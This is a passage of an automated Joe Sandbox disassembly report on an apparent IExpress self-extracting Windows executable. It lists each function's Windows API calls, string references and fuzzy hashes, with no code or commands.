Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: FileTime$AttributesDateItemLocalText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 851750970-1193786559
Opcode ID: 7d875f159341b7230950f18f2f71abc3d82ac459eefbd0f33785da50a5c8e793
Instruction ID: afff763dc7989840f95e3f4a29bed04a444c1de593126e42dd452fe3dc51e06a
Opcode Fuzzy Hash: 7d875f159341b7230950f18f2f71abc3d82ac459eefbd0f33785da50a5c8e793
Instruction Fuzzy Hash: 91517D72A18A4A81FB619B29E4582BD33B0FB84B91F4425B1DF5EC7295DF2CEC41C348

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC44CC0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF6BAC44CE8
SizeofResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44CF3
FindResourceA.KERNEL32 ref: 00007FF6BAC44D13
LoadResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D1E
LockResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D27
memcpy_s.MSVCRT ref: 00007FF6BAC44D40
FreeResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D49

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID:
API String ID: 3370778649-0
Opcode ID: e75314f0317059066ea3fc699c563cfa39b45419fc3ce52d9c4f3efc5764e6ed
Instruction ID: 9906564adc352070c687aa11cff9e290bbae3cb93dfc65b27ac66f739e18941e
Opcode Fuzzy Hash: e75314f0317059066ea3fc699c563cfa39b45419fc3ce52d9c4f3efc5764e6ed
Instruction Fuzzy Hash: F8116531B09B5143EB285B6AAA5C13E62B1AF49FD0F144478DE0EC7B64DF3CD5418308

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC44EB0 Relevance: 3.8, APIs: 3, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6BAC44ECA
LocalAlloc.KERNELBASE ref: 00007FF6BAC44F1A
LocalFree.KERNEL32 ref: 00007FF6BAC44F4E

Part of subcall function 00007FF6BAC44A70: LoadStringA.USER32 ref: 00007FF6BAC44B04
Part of subcall function 00007FF6BAC44A70: MessageBoxA.USER32 ref: 00007FF6BAC44B3E

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID:
API String ID: 359063898-0
Opcode ID: df506fcc578f1f5a35d9edf51cb282eae134de726cbd6bb7c6ea0e4f9a4b56c5
Instruction ID: 1c14dbd64ab6c4c5a453c6fcf2ff57dd43ea144f0b169e0ea054575a769eb846
Opcode Fuzzy Hash: df506fcc578f1f5a35d9edf51cb282eae134de726cbd6bb7c6ea0e4f9a4b56c5
Instruction Fuzzy Hash: AC21B071A0868243FB60CB18E51837966B0EB847A4F205274DFAD83BD5DF3CE4808708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC45280 Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BAC43908: MsgWaitForMultipleObjects.USER32 ref: 00007FF6BAC4392C
Part of subcall function 00007FF6BAC43908: PeekMessageA.USER32 ref: 00007FF6BAC4394B
Part of subcall function 00007FF6BAC43908: PeekMessageA.USER32 ref: 00007FF6BAC43983

WriteFile.KERNELBASE ref: 00007FF6BAC452D4

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: d49133d5c2195b87ebe0def94a96092c9cfef79a36c4b08e02082d86901b1f76
Instruction ID: 5a0a50263f05c4f6d486d4476c5a442f098e2299799ac70a0c646fd57e0f037a
Opcode Fuzzy Hash: d49133d5c2195b87ebe0def94a96092c9cfef79a36c4b08e02082d86901b1f76
Instruction Fuzzy Hash: B9115C21A0864682EB20CF1EE88833977B0BF94798F544275DF5D86AE5CF7DE805CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC44E00 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE ref: 00007FF6BAC44E0D
SetFileAttributesA.KERNEL32 ref: 00007FF6BAC44E88

Part of subcall function 00007FF6BAC47304: FindResourceA.KERNEL32 ref: 00007FF6BAC4732E
Part of subcall function 00007FF6BAC47304: LoadResource.KERNEL32 ref: 00007FF6BAC4733F
Part of subcall function 00007FF6BAC47304: DialogBoxIndirectParamA.USER32 ref: 00007FF6BAC4736F
Part of subcall function 00007FF6BAC47304: FreeResource.KERNEL32 ref: 00007FF6BAC4737B

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 2018477427-0
Opcode ID: 243369eae741d19aacabb87601a44f38098308e578327846539de662b5f04598
Instruction ID: a3dc709fbea641386268d663b56311380f2546687d6107fcdec5ff0efbfba3b4
Opcode Fuzzy Hash: 243369eae741d19aacabb87601a44f38098308e578327846539de662b5f04598
Instruction Fuzzy Hash: 39116D31A0CA4282FB515B2CE65C37962B1EF45358F2441B4DF6C866E5CF7EA885824C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC473CC Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharPrevA.USER32 ref: 00007FF6BAC47413

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: f6a6154face52e81029e11cba967ae538a48f1189fe03ca7acaab31d68f019d0
Instruction ID: 3a57aff804fe97f249b9cc185aa91acf1c918a4276bc2edfb14a3d7e392d19b7
Opcode Fuzzy Hash: f6a6154face52e81029e11cba967ae538a48f1189fe03ca7acaab31d68f019d0
Instruction Fuzzy Hash: 3601B921A0C7C185F7114B19F84833D7EA09745BE0F6862B0DF69476D6CF6CD4528B48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC45350 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF6BAC45389

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e2199ce9ef1e50f94450445b336f8eb1f800428b427470215b6e51b7e546b616
Instruction ID: 2cbf35cfb5daccb94709af44acfb1d41bc399fb4acb1290a8ad5c2ec57cff754
Opcode Fuzzy Hash: e2199ce9ef1e50f94450445b336f8eb1f800428b427470215b6e51b7e546b616
Instruction Fuzzy Hash: B7F03A31A0868693EB2C4F2DF68517932B0EB48B58F104279DF2B87688CFB8DC81C714

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF6BAC433C0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 00007FF6BAC4343A
EndDialog.USER32 ref: 00007FF6BAC435BA
GetDesktopWindow.USER32 ref: 00007FF6BAC435E4
SetWindowTextA.USER32 ref: 00007FF6BAC435FF
SendDlgItemMessageA.USER32 ref: 00007FF6BAC4361D
GetDlgItem.USER32 ref: 00007FF6BAC43634
EnableWindow.USER32 ref: 00007FF6BAC4363F
EndDialog.USER32 ref: 00007FF6BAC4364C

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC434B3
, xrefs: 00007FF6BAC43528
tha, xrefs: 00007FF6BAC435F5

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$tha
API String ID: 3530494346-1140696522
Opcode ID: a7949f37bcc4c6ea6267cc44147ec5942efdad2b95388f52c49a8d805a607ebc
Instruction ID: 05fc2e333929f2e2aa37ed411070435404f0e7b78523f35e63726859974431f8
Opcode Fuzzy Hash: a7949f37bcc4c6ea6267cc44147ec5942efdad2b95388f52c49a8d805a607ebc
Instruction Fuzzy Hash: F761AF64E0C64386FBA09B29A94C3BA26B1AFD4B94F1445B4CF4EC2BD5CF2CE545870C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC412C0 Relevance: 16.6, APIs: 11, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BAC411C0: LoadLibraryA.KERNEL32 ref: 00007FF6BAC411FD
Part of subcall function 00007FF6BAC411C0: GetProcAddress.KERNEL32 ref: 00007FF6BAC41219
Part of subcall function 00007FF6BAC411C0: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF6BAC41260
Part of subcall function 00007FF6BAC411C0: FreeSid.ADVAPI32 ref: 00007FF6BAC41282
Part of subcall function 00007FF6BAC411C0: FreeLibrary.KERNEL32 ref: 00007FF6BAC4128B

GetCurrentProcess.KERNEL32 ref: 00007FF6BAC41321
OpenProcessToken.ADVAPI32 ref: 00007FF6BAC41331
GetTokenInformation.ADVAPI32 ref: 00007FF6BAC41354
GetLastError.KERNEL32 ref: 00007FF6BAC41362
LocalAlloc.KERNEL32 ref: 00007FF6BAC41376
GetTokenInformation.ADVAPI32 ref: 00007FF6BAC4139E
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF6BAC413E5
EqualSid.ADVAPI32 ref: 00007FF6BAC4140A
FreeSid.ADVAPI32 ref: 00007FF6BAC41429
LocalFree.KERNEL32 ref: 00007FF6BAC41432
CloseHandle.KERNEL32 ref: 00007FF6BAC4143C

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 97142c8180b182c09d7e65f73d61bf3d69a57c2ebd7ef9200e0a5b9acfa85d0c
Instruction ID: b2035fa22a4886ff5d4fa8c0525f3d158d6fb6a685e1b4005ba539a09abc2ec3
Opcode Fuzzy Hash: 97142c8180b182c09d7e65f73d61bf3d69a57c2ebd7ef9200e0a5b9acfa85d0c
Instruction Fuzzy Hash: 47513132A086528AE720CF29E4996AD73B4FB48B88F412175EF4E93754DF3DE844C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC41B44 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6BAC42AF3), ref: 00007FF6BAC41B59
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF6BAC42AF3), ref: 00007FF6BAC41B6C
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF6BAC41BA7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6BAC41BD8
CloseHandle.KERNEL32 ref: 00007FF6BAC41BE5
ExitWindowsEx.USER32 ref: 00007FF6BAC41C08

Strings

SeShutdownPrivilege, xrefs: 00007FF6BAC41BA0

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 2829607268-3733053543
Opcode ID: 755c1f95413603282cdaf0838d41edb21c135bbbd8bb097cb716c8789541b3cb
Instruction ID: 1ca2ea80f31506383d6db9be042d4e3e473e46910650c4ce197fb20de5834525
Opcode Fuzzy Hash: 755c1f95413603282cdaf0838d41edb21c135bbbd8bb097cb716c8789541b3cb
Instruction Fuzzy Hash: 6B217172A1C64282F7608B68F49E77A7370FB84759F105176EF4E86A54DF3CD0448B08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC48114 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6BAC48144
GetCurrentProcessId.KERNEL32 ref: 00007FF6BAC48152
GetCurrentThreadId.KERNEL32 ref: 00007FF6BAC4815E
GetTickCount.KERNEL32 ref: 00007FF6BAC4816A
GetTickCount.KERNEL32 ref: 00007FF6BAC4817A
QueryPerformanceCounter.KERNEL32 ref: 00007FF6BAC48195

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: 4f2a0639155c5e925320fcd736b091fdafd92ce9187d839ac1d0c4f5e4d7b07b
Instruction ID: 39323644bab23932800c3816bc5ea1a3d18bdeb0d4bf824ad428af985d57e93d
Opcode Fuzzy Hash: 4f2a0639155c5e925320fcd736b091fdafd92ce9187d839ac1d0c4f5e4d7b07b
Instruction Fuzzy Hash: 68111A26A04B418AEB10DF79E8882A933B4FB09758F401A35EF6D87754EF7CD5A48384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC46998 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 434COMMON

Download Yara Rule

APIs

CharNextA.USER32 ref: 00007FF6BAC46A10
GetModuleFileNameA.KERNEL32 ref: 00007FF6BAC46AE5
CharUpperA.USER32 ref: 00007FF6BAC46B22
CharUpperA.USER32 ref: 00007FF6BAC46BB2
CompareStringA.KERNEL32 ref: 00007FF6BAC46C40
CharUpperA.USER32 ref: 00007FF6BAC46C75
CharUpperA.USER32 ref: 00007FF6BAC46CCB
CharUpperA.USER32 ref: 00007FF6BAC46D5E
CloseHandle.KERNEL32 ref: 00007FF6BAC46F5E
ExitProcess.KERNEL32 ref: 00007FF6BAC46F66

Strings

@, xrefs: 00007FF6BAC46F3E
:, xrefs: 00007FF6BAC46D09
", xrefs: 00007FF6BAC46A71
RegServer, xrefs: 00007FF6BAC46C31

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$:$@$RegServer
API String ID: 1203814774-4077547207
Opcode ID: 8c25c38a347ead366493633ec2e51024fedd98f7c8ab48903e63ab2df250a0f9
Instruction ID: c9d5e6332730d069ffa18bfa0e7fc9198c0b25f6cff1ac4ca7856de7d0757eb9
Opcode Fuzzy Hash: 8c25c38a347ead366493633ec2e51024fedd98f7c8ab48903e63ab2df250a0f9
Instruction Fuzzy Hash: 2802DE61E0CA8241FB248B2C985C2B96BB1AF41794F5845B5CF9E866EDCF3DE805D70C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC43720 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 107threadwindowCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00007FF6BAC43774
ResetEvent.KERNEL32 ref: 00007FF6BAC43796
SetEvent.KERNEL32 ref: 00007FF6BAC437D7
GetDesktopWindow.USER32 ref: 00007FF6BAC43810
GetDlgItem.USER32 ref: 00007FF6BAC43834
SendMessageA.USER32 ref: 00007FF6BAC4384B
GetDlgItem.USER32 ref: 00007FF6BAC43856
SendMessageA.USER32 ref: 00007FF6BAC4386F
SetWindowTextA.USER32 ref: 00007FF6BAC4387F
CreateThread.KERNEL32 ref: 00007FF6BAC438A4
EndDialog.USER32 ref: 00007FF6BAC438E8

Strings

, xrefs: 00007FF6BAC437BA
tha, xrefs: 00007FF6BAC43875

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
String ID: $tha
API String ID: 2654313074-3973746845
Opcode ID: b3c2b2ef615d35578e8726eb57ba44340733395281d979963716657eb2164978
Instruction ID: 9d4d553c0ca063343bc710a9ec55b8de298820a332d67354305bc4d7f2b3c7fa
Opcode Fuzzy Hash: b3c2b2ef615d35578e8726eb57ba44340733395281d979963716657eb2164978
Instruction Fuzzy Hash: B8418265E0C64282FB649B1DE99C27962B1AFC57A4F1042B2DF1DC6BE9CF3CA445C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC44768 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BAC4346D), ref: 00007FF6BAC4478E
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BAC4346D), ref: 00007FF6BAC447AC
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BAC4346D), ref: 00007FF6BAC447C6
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BAC4346D), ref: 00007FF6BAC447E2
GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BAC4346D), ref: 00007FF6BAC4480B
CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BAC4346D), ref: 00007FF6BAC44824
CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BAC4346D), ref: 00007FF6BAC44838
FreeLibrary.KERNEL32 ref: 00007FF6BAC448CF
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BAC4346D), ref: 00007FF6BAC448E5

Strings

SHBrowseForFolder, xrefs: 00007FF6BAC447A2
SHELL32.DLL, xrefs: 00007FF6BAC44787
SHGetPathFromIDList, xrefs: 00007FF6BAC447D8

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 736fc19ecd43b7d2575f89e8e3507fd18e5a39b1beba44f6e218ac1590884990
Instruction ID: 9d43c87132343ef99ae5e8fdcc8aef9a27e220a359c25541b8127cee42048dca
Opcode Fuzzy Hash: 736fc19ecd43b7d2575f89e8e3507fd18e5a39b1beba44f6e218ac1590884990
Instruction Fuzzy Hash: 8D41B925A0DB8286FB508B19B96817A37B0BF44B90F6401B5DF9E837A1DF3CE449C308

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC44A70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151memorywindowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 00007FF6BAC44B04
LocalAlloc.KERNEL32 ref: 00007FF6BAC44BF0
LocalAlloc.KERNEL32 ref: 00007FF6BAC44C22
MessageBoxA.USER32 ref: 00007FF6BAC44B3E

Part of subcall function 00007FF6BAC47614: EnumResourceLanguagesA.KERNEL32 ref: 00007FF6BAC4766C
Part of subcall function 00007FF6BAC47614: EnumResourceLanguagesA.KERNEL32 ref: 00007FF6BAC476A4

LocalAlloc.KERNEL32 ref: 00007FF6BAC44B94
MessageBeep.USER32 ref: 00007FF6BAC44C45
MessageBoxA.USER32 ref: 00007FF6BAC44C84
LocalFree.KERNEL32 ref: 00007FF6BAC44C8F

Part of subcall function 00007FF6BAC476D8: GetVersionExA.KERNEL32 ref: 00007FF6BAC4772D
Part of subcall function 00007FF6BAC476D8: GetSystemMetrics.USER32 ref: 00007FF6BAC47761
Part of subcall function 00007FF6BAC476D8: RegOpenKeyExA.ADVAPI32 ref: 00007FF6BAC47790
Part of subcall function 00007FF6BAC476D8: RegQueryValueExA.ADVAPI32 ref: 00007FF6BAC477C5
Part of subcall function 00007FF6BAC476D8: RegCloseKey.ADVAPI32 ref: 00007FF6BAC477D2
Part of subcall function 00007FF6BAC476D8: CharNextA.USER32 ref: 00007FF6BAC4781B

Strings

rce., xrefs: 00007FF6BAC44A9B
tha, xrefs: 00007FF6BAC44B2F, 00007FF6BAC44C70

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

